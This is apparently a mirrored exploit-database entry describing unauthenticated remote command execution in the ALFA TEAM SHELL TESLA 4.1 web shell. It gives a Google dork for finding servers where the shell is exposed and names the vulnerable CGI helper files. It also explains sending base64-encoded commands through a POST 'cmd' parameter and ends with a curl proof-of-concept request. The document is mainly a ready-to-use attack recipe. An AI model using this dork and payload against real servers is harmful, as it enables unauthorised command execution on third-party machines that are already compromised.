Share
## https://sploitus.com/exploit?id=PACKETSTORM:165366
# Exploit Title: ALFA TEAM SHELL TESLA 4.1 - 'cmd' Remote Code Execution (Unauthenticated)  
# Google Dork: inurl:/alfacgiapi intext:alfa  
# Date: 2021-12-19  
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage: http://solevisible.com  
# Software Link: https://phpshells.com/alfa-tesla-v4-1-shell  
# Version: v4.1  
# Tested on: Windows 10 Enterprise x64 , Linux  
  
# [ About - ALFA TEAM SHELL TESLA ] :  
  
#It is one of the most popular web shells used by hackers,They use it to access the server side.  
  
# [ Vulnerable Files ] :   
  
# 1 . perl.alfa  
# 2 . bash.alfa  
# 3 . py.alfa  
  
# [ Description ]:  
  
#Execute commands without authentication or logging in to the web shell,  
#To use, find only one of the vulnerable files,  
#Convert your commands to base64 And Submit your request using the CMD parameter and the POST method.  
  
# [ POC ] :  
  
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa